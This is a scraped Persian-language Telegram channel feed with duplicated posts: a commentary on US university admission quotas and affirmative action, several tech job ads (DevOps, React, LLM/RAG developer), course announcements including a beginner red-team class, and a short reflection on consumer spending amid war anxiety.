◾️دانشگاههای خصوصی: دانشگاه هاروارد، مثل خیلی از دانشگاههای برتر خصوصی، دو مسیر برای پذیرش دارد. یکی مسیر عادی که دانشجویان را بر اساس شایستگیهای فردی ارزیابی میکند و مسیر دومی که دانشجویان را از طریق چهار سهمیه پذیرش میکند: ورزشکاران، Legacies (فرزندان فارغالتحصیلان)، Dean's Interest List (فرزندان ثروتمندان) و فرزندان اساتید. اگرچه جزئیات سهمیهبندی جایی گفته نمیشود، برآورد شده تا ۳۰ درصد پذیرفتهشدگان هاروارد سهمیهای هستند. این سهمیهها البته بشدت به نفع سفیدپوستان استفاده میشدند.
◾️دانشگاههای دولتی: سهمیهبندی در دانشگاههای دولتی، به سبب رقابت کمتر، به ندرت وجود دارد. برای مثال سهمیه Legacy در اغلب دانشگاههای ایالتی غیرقانونی است. همینطور فرزندان اساتید سهمیهای ندارند اما در صورت پذیرش، از تخفیف شهریه برخوردار میشوند. در این زمینه یک استثنا وجود داشت. با اوج گرفتن جنبشهای مدنی در آمریکا از ۱۹۶۰ به بعد، دانشگاهها شروع به سیاستگذاریهایی کردند تا شانس بیشتری به گروههایی که بطور تاریخی محروم قرار گرفتهاند داده شود. این مساله که به عنوان affirmative action شناخته میشد، سهمیه خاصی برای گروههای نژادی (خصوصا سیاهپوستان) تعریف میکرد.
◾️چالشهای قانونی: در سال ۲۰۲۳ دادگاه عالی آمریکا رای به غیرقانونی بودن درنظرگیری نژاد بعنوان عاملی برای پذیرش در دانشگاههای آمریکا داد. حتی دانشگاههای خصوصی هم شامل این مساله شدند بطوریکه اگرچه سهمیههایی که برای مثال در هاروارد ذکر شد همچنان پابرجا باقی مانده است، اما فاکتور نژاد باید از آن حذف شود. همچنین تعیین درصد ثابت برای هر نوع سهمیهای غیرقانونی است.
◾️سهمیه نظامیها: در دانشگاههای آمریکا سهمیهای برای ارتشیها و یا نظامیهای آسیبدیده در جنگ و خانواده آنها وجود ندارد اما چنین مواردی میتواند به عنوان امتیاز مثبت در فرآیند پذیرش در نظر گرفته شود.
◾️کلام آخر: بحث پذیرش در دانشگاههای آمریکا بسیار مفصل است و من اینجا صرفا در حد کشش یک پست لینکدین در مورد آن نوشتم. اما خوب است بگویم که اساسا در سیستم سرمایهداری آمریکا، پول در آموزش عالی، مثل هر زمینهی دیگری، حرف اول و آخر را میزند، طوریکه میتوانیم ضربالمثل معروف خودمان را اینطور بازگو کنیم که شما دانشجویی از خانواده پولدار باش، روی سبیل رئیس دانشگاه هاروارد نقاره بزن!
✍️دکتر قدرت ابادی
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
◾️دانشگاههای خصوصی: دانشگاه هاروارد، مثل خیلی از دانشگاههای برتر خصوصی، دو مسیر برای پذیرش دارد. یکی مسیر عادی که دانشجویان را بر اساس شایستگیهای فردی ارزیابی میکند و مسیر دومی که دانشجویان را از طریق چهار سهمیه پذیرش میکند: ورزشکاران، Legacies (فرزندان فارغالتحصیلان)، Dean's Interest List (فرزندان ثروتمندان) و فرزندان اساتید. اگرچه جزئیات سهمیهبندی جایی گفته نمیشود، برآورد شده تا ۳۰ درصد پذیرفتهشدگان هاروارد سهمیهای هستند. این سهمیهها البته بشدت به نفع سفیدپوستان استفاده میشدند.
◾️دانشگاههای دولتی: سهمیهبندی در دانشگاههای دولتی، به سبب رقابت کمتر، به ندرت وجود دارد. برای مثال سهمیه Legacy در اغلب دانشگاههای ایالتی غیرقانونی است. همینطور فرزندان اساتید سهمیهای ندارند اما در صورت پذیرش، از تخفیف شهریه برخوردار میشوند. در این زمینه یک استثنا وجود داشت. با اوج گرفتن جنبشهای مدنی در آمریکا از ۱۹۶۰ به بعد، دانشگاهها شروع به سیاستگذاریهایی کردند تا شانس بیشتری به گروههایی که بطور تاریخی محروم قرار گرفتهاند داده شود. این مساله که به عنوان affirmative action شناخته میشد، سهمیه خاصی برای گروههای نژادی (خصوصا سیاهپوستان) تعریف میکرد.
◾️چالشهای قانونی: در سال ۲۰۲۳ دادگاه عالی آمریکا رای به غیرقانونی بودن درنظرگیری نژاد بعنوان عاملی برای پذیرش در دانشگاههای آمریکا داد. حتی دانشگاههای خصوصی هم شامل این مساله شدند بطوریکه اگرچه سهمیههایی که برای مثال در هاروارد ذکر شد همچنان پابرجا باقی مانده است، اما فاکتور نژاد باید از آن حذف شود. همچنین تعیین درصد ثابت برای هر نوع سهمیهای غیرقانونی است.
◾️سهمیه نظامیها: در دانشگاههای آمریکا سهمیهای برای ارتشیها و یا نظامیهای آسیبدیده در جنگ و خانواده آنها وجود ندارد اما چنین مواردی میتواند به عنوان امتیاز مثبت در فرآیند پذیرش در نظر گرفته شود.
◾️کلام آخر: بحث پذیرش در دانشگاههای آمریکا بسیار مفصل است و من اینجا صرفا در حد کشش یک پست لینکدین در مورد آن نوشتم. اما خوب است بگویم که اساسا در سیستم سرمایهداری آمریکا، پول در آموزش عالی، مثل هر زمینهی دیگری، حرف اول و آخر را میزند، طوریکه میتوانیم ضربالمثل معروف خودمان را اینطور بازگو کنیم که شما دانشجویی از خانواده پولدار باش، روی سبیل رئیس دانشگاه هاروارد نقاره بزن!
✍️دکتر قدرت ابادی
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍1🔥1👏1🎉1🕊1
سلام دوستان، ما در تیممون دنبال یک #مهندس_DevOps حرفهای، بااستعداد و پرانرژی به صورت #ریموت و #پارت_تایم هستیم.
برامون خیلی مهمه که در مهارتها و ابزارهای گفتهشده، تجربهی واضح، عملی و قابل ارائه داشته باشین. بخاط همین نیازمندی ها رو لطفا با دقت بخونین و در صورت یکسان بودن رزومه تون با شرایط بهمون پیام بدین. وظایفی که از شما انتظار داریم:
طراحی، پیادهسازی و نگهداری CI/CD Pipelineها برای بهبود فرآیند توسعه و استقرار
مدیریت و بهینهسازی زیرساختهای ابری و سرورها
مانیتورینگ، دیباگ و افزایش پایداری سیستمها
همکاری نزدیک با تیم توسعه برای بهبود عملکرد و مقیاسپذیری سیستمها مهارتهای موردنیاز:
تسلط کامل به اجرای CI/CD در GitLab
مهارت بالا در مدیریت Containerها و Docker
آشنایی با مفاهیم و ابزارهای Backup هوشمند
آشنایی با مفاهیم امنیتی و شبکه
روحیه تیمی، مسئولیتپذیری و علاقهمندی به یادگیری مداوم
لطفاً رزومهت به همراه دستمزد مدنظرت برای همکاری پارتتایم (ساعتی) رو برامون بفرست:
selectivest@gmail.com
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
برامون خیلی مهمه که در مهارتها و ابزارهای گفتهشده، تجربهی واضح، عملی و قابل ارائه داشته باشین. بخاط همین نیازمندی ها رو لطفا با دقت بخونین و در صورت یکسان بودن رزومه تون با شرایط بهمون پیام بدین. وظایفی که از شما انتظار داریم:
طراحی، پیادهسازی و نگهداری CI/CD Pipelineها برای بهبود فرآیند توسعه و استقرار
مدیریت و بهینهسازی زیرساختهای ابری و سرورها
مانیتورینگ، دیباگ و افزایش پایداری سیستمها
همکاری نزدیک با تیم توسعه برای بهبود عملکرد و مقیاسپذیری سیستمها مهارتهای موردنیاز:
تسلط کامل به اجرای CI/CD در GitLab
مهارت بالا در مدیریت Containerها و Docker
آشنایی با مفاهیم و ابزارهای Backup هوشمند
آشنایی با مفاهیم امنیتی و شبکه
روحیه تیمی، مسئولیتپذیری و علاقهمندی به یادگیری مداوم
لطفاً رزومهت به همراه دستمزد مدنظرت برای همکاری پارتتایم (ساعتی) رو برامون بفرست:
selectivest@gmail.com
Please open Telegram to view this post
VIEW IN TELEGRAM
دوره تیم قرمز مقدماتی گروه یک
دکتر رضا حسین زاده
دوشنبه ها ۱۰ شب ایران
شروع قطعی هفته اول مهر
@xcode0x
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
دکتر رضا حسین زاده
دوشنبه ها ۱۰ شب ایران
شروع قطعی هفته اول مهر
@xcode0x
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩3👍2🔥1👏1😱1🎉1
درود به همراهان گرامی
دوره لابراتوار CCIE بصورت آفلاین آماده اجرا شد اگر مایل بودید به این کلاس خاص بپیوندید چون هدفمون ادامه دوره در گرایشهای دیگر هم هست.
هماهنگی :
@xcode0x
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
دوره لابراتوار CCIE بصورت آفلاین آماده اجرا شد اگر مایل بودید به این کلاس خاص بپیوندید چون هدفمون ادامه دوره در گرایشهای دیگر هم هست.
هماهنگی :
@xcode0x
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🔥1😱1
این روزها که در مالهای تهران قدم میزنم، شلوغی جمعیت (چه در کافهها و چه در فروشگاهها ) بهوضوح به چشم میآید.
در شرایطی که مردم بهواسطه اوضاع اقتصادی و احتمال جنگ باید بیشتر به پسانداز فکر کنند، آنها را فوجفوج مشغول خرید یا کافهگردیهای گران میبینم.
بهتازگی، هنگام مطالعه کتاب «غریزه اراده» (The Willpower Instinct) نوشته کلی مکگونیگال، بخش «مدیریت وحشت» توجهم را جلب کرد.
طبق آنچه کتاب توضیح میدهد، میتوان نتیجه گرفت که مردم پس از تجربه وحشت جنگ و اضطراب آینده، بهطور ناخودآگاه به خرید و خرجکردن هجوم میآورند.
این مقوله در سایر رفتارهای انسانی هم دیده میشود
✍️نوروزی- مشاور امنیت سایبری
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
در شرایطی که مردم بهواسطه اوضاع اقتصادی و احتمال جنگ باید بیشتر به پسانداز فکر کنند، آنها را فوجفوج مشغول خرید یا کافهگردیهای گران میبینم.
بهتازگی، هنگام مطالعه کتاب «غریزه اراده» (The Willpower Instinct) نوشته کلی مکگونیگال، بخش «مدیریت وحشت» توجهم را جلب کرد.
طبق آنچه کتاب توضیح میدهد، میتوان نتیجه گرفت که مردم پس از تجربه وحشت جنگ و اضطراب آینده، بهطور ناخودآگاه به خرید و خرجکردن هجوم میآورند.
این مقوله در سایر رفتارهای انسانی هم دیده میشود
✍️نوروزی- مشاور امنیت سایبری
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍2😱2🔥1
📢 We're Hiring: Senior Front-End Developer (React)/(Full time/On-site)
📍 Tehran, Vanak
📒 At least B.S. degree in the related majors such as Computer and IT, Electronic Engineering, etc.
. Military service must be done.
If you are interested, please check the requirements below and send your CV to Maryam.Abbasi@nak-mci.ir.
Requirements:
· 2 years of experience in Front-End (React)
· JavaScript (ES6)
· TypeScript
· React (Functional Programing)
· State management (Redux, Zu stand ,...)
· Styled component (EmotionJS)
· Task Runner (Vite)
· Dom manipulation & Browser API's
· VC (GIT)
· NPM
· Axios
· Custom Hook
· Form handling libraries
· React-router-dom
· React-Query
#NAK #Hiring #Recruitment #jobs #telecomjobs
#jobvacancy #front_end #Frontend #Development #React #IT
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
📍 Tehran, Vanak
📒 At least B.S. degree in the related majors such as Computer and IT, Electronic Engineering, etc.
. Military service must be done.
If you are interested, please check the requirements below and send your CV to Maryam.Abbasi@nak-mci.ir.
Requirements:
· 2 years of experience in Front-End (React)
· JavaScript (ES6)
· TypeScript
· React (Functional Programing)
· State management (Redux, Zu stand ,...)
· Styled component (EmotionJS)
· Task Runner (Vite)
· Dom manipulation & Browser API's
· VC (GIT)
· NPM
· Axios
· Custom Hook
· Form handling libraries
· React-router-dom
· React-Query
#NAK #Hiring #Recruitment #jobs #telecomjobs
#jobvacancy #front_end #Frontend #Development #React #IT
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1🔥1😱1
12 سپتامبر - دو روز دیگه
اختراع جهانی یکی از دوستانمون پابلیش میشه
اگر لایک رو بزارید که یک لایو بزاریم و توضیحاتی در این #اختراع شون که در 157 کشور هم ثبت شده بدن 😇🌺
اگر دوست دارین شما هم مخترع جهانی بشید حتما در لایو مون حضور پیدا کنین
اگر ویو ی این پست به 1k برسه
لایو میریم
پس برای دوستانتون هم بفرستید🌹
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اختراع جهانی یکی از دوستانمون پابلیش میشه
اگر لایک رو بزارید که یک لایو بزاریم و توضیحاتی در این #اختراع شون که در 157 کشور هم ثبت شده بدن 😇🌺
اگر دوست دارین شما هم مخترع جهانی بشید حتما در لایو مون حضور پیدا کنین
اگر ویو ی این پست به 1k برسه
لایو میریم
پس برای دوستانتون هم بفرستید
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍3👏2🔥1😱1🎉1🤩1🕊1👨💻1
📢 دعوت به همکاری: #توسعهدهنده #هوش_مصنوعی (متخصص LLM)
ما در استارتاپ Qio-ai، برای پیشبرد پروژههای نوآورانه خود در حوزه هوش مصنوعی، به دنبال یک توسعهدهنده متخصص و خلاق هستیم. اگر به دنیای مدلهای زبان بزرگ (LLM) علاقهمندید و میخواهید در توسعه محصولات هوشمند و کاربردی نقش داشته باشید، جای شما در تیم ما خالی است.
🧠 درباره Qio-ai
استارتاپ Qio-ai، تیمی پویا و رو به رشد است که بر ساخت راهکارهای هوشمند مبتنی بر AI تمرکز دارد. اولین پروژه ما، توسعه یک چتبات پیشرفته و تخصصی با معماری RAG است و اهداف بزرگی برای تولید محصولات متنوع در این حوزه داریم. ما به دنبال فردی هستیم که با انرژی و تخصص خود، به ما در این مسیر هیجانانگیز کمک کند.
🛠 شرح وظایف و مسئولیتها
طراحی، توسعه و پیادهسازی pipeline پروژههای هوش مصنوعی، بهویژه در حوزه RAG.
توسعه و نگهداری APIهای مرتبط با مدلهای زبان بزرگ (LLM).
کار با دیتابیسهای مختلف، از جمله Vector Storeها برای مدیریت و بازیابی بهینه اطلاعات.
تحقیق، ارزیابی و پیادهسازی جدیدترین الگوریتمها و تکنیکهای حوزه AI.
مشارکت در تصمیمگیریهای فنی و کمک به بهبود معماری سیستم.
مستندسازی فنی و گزارشدهی از روند پیشرفت.
📌 مهارتهای کلیدی مورد نیاز
تسلط بر مفاهیم یادگیری ماشین، یادگیری عمیق و پردازش زبان طبیعی (NLP).
تجربه عملی و قابل ارائه در توسعه پروژههای مبتنی بر LLM (مانند مدلهای خانواده GPT، Llama و...).
مهارت بالا در برنامهنویسی Python و کتابخانههای تخصصی (PyTorch, TensorFlow, LangChain, Hugging Face).
تجربه کار با APIها و توسعه سرویسهای وب (FastAPI, Flask).
آشنایی کامل با Vector Storeها (مانند ChromaDB, Pinecone, FAISS).
آشنایی با ابزارهای MLOps مانند Docker و تسلط بر Git.
توانایی حل مسئله، روحیه کار تیمی و اشتیاق به یادگیری مداوم.
💼 شرایط همکاری
ما برای جذب بهترین استعدادها، هر دو مدل همکاری را فراهم کردهایم:
- استخدام (تماموقت/پارهوقت):
حقوق رقابتی و توافقی.
امکان استقرار در مرکز کارآفرینی دانشگاه صنعتی شریف
ساعت کاری منعطف و امکان دورکاری
فرصت رشد و یادگیری بلندمدت در کنار تیم.
- همکاری پروژهای (Freelance):
پرداخت توافقی و متناسب با هر پروژه.
همکاری کاملاً دورکاری و منعطف.
امکان همکاری در پروژههای آتی در صورت رضایت طرفین.
اگر به این فرصت همکاری علاقهمند هستید، لطفاً رزومه و نمونهکارهای خود را به ایمیل زیر ارسال کنید و مدل همکاری مورد نظر خود (استخدام یا پروژهای) را ذکر بفرمایید.
info.qioai@gmail.com
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
ما در استارتاپ Qio-ai، برای پیشبرد پروژههای نوآورانه خود در حوزه هوش مصنوعی، به دنبال یک توسعهدهنده متخصص و خلاق هستیم. اگر به دنیای مدلهای زبان بزرگ (LLM) علاقهمندید و میخواهید در توسعه محصولات هوشمند و کاربردی نقش داشته باشید، جای شما در تیم ما خالی است.
🧠 درباره Qio-ai
استارتاپ Qio-ai، تیمی پویا و رو به رشد است که بر ساخت راهکارهای هوشمند مبتنی بر AI تمرکز دارد. اولین پروژه ما، توسعه یک چتبات پیشرفته و تخصصی با معماری RAG است و اهداف بزرگی برای تولید محصولات متنوع در این حوزه داریم. ما به دنبال فردی هستیم که با انرژی و تخصص خود، به ما در این مسیر هیجانانگیز کمک کند.
🛠 شرح وظایف و مسئولیتها
طراحی، توسعه و پیادهسازی pipeline پروژههای هوش مصنوعی، بهویژه در حوزه RAG.
توسعه و نگهداری APIهای مرتبط با مدلهای زبان بزرگ (LLM).
کار با دیتابیسهای مختلف، از جمله Vector Storeها برای مدیریت و بازیابی بهینه اطلاعات.
تحقیق، ارزیابی و پیادهسازی جدیدترین الگوریتمها و تکنیکهای حوزه AI.
مشارکت در تصمیمگیریهای فنی و کمک به بهبود معماری سیستم.
مستندسازی فنی و گزارشدهی از روند پیشرفت.
📌 مهارتهای کلیدی مورد نیاز
تسلط بر مفاهیم یادگیری ماشین، یادگیری عمیق و پردازش زبان طبیعی (NLP).
تجربه عملی و قابل ارائه در توسعه پروژههای مبتنی بر LLM (مانند مدلهای خانواده GPT، Llama و...).
مهارت بالا در برنامهنویسی Python و کتابخانههای تخصصی (PyTorch, TensorFlow, LangChain, Hugging Face).
تجربه کار با APIها و توسعه سرویسهای وب (FastAPI, Flask).
آشنایی کامل با Vector Storeها (مانند ChromaDB, Pinecone, FAISS).
آشنایی با ابزارهای MLOps مانند Docker و تسلط بر Git.
توانایی حل مسئله، روحیه کار تیمی و اشتیاق به یادگیری مداوم.
💼 شرایط همکاری
ما برای جذب بهترین استعدادها، هر دو مدل همکاری را فراهم کردهایم:
- استخدام (تماموقت/پارهوقت):
حقوق رقابتی و توافقی.
امکان استقرار در مرکز کارآفرینی دانشگاه صنعتی شریف
ساعت کاری منعطف و امکان دورکاری
فرصت رشد و یادگیری بلندمدت در کنار تیم.
- همکاری پروژهای (Freelance):
پرداخت توافقی و متناسب با هر پروژه.
همکاری کاملاً دورکاری و منعطف.
امکان همکاری در پروژههای آتی در صورت رضایت طرفین.
اگر به این فرصت همکاری علاقهمند هستید، لطفاً رزومه و نمونهکارهای خود را به ایمیل زیر ارسال کنید و مدل همکاری مورد نظر خود (استخدام یا پروژهای) را ذکر بفرمایید.
info.qioai@gmail.com
Please open Telegram to view this post
VIEW IN TELEGRAM
😱2❤1👍1👏1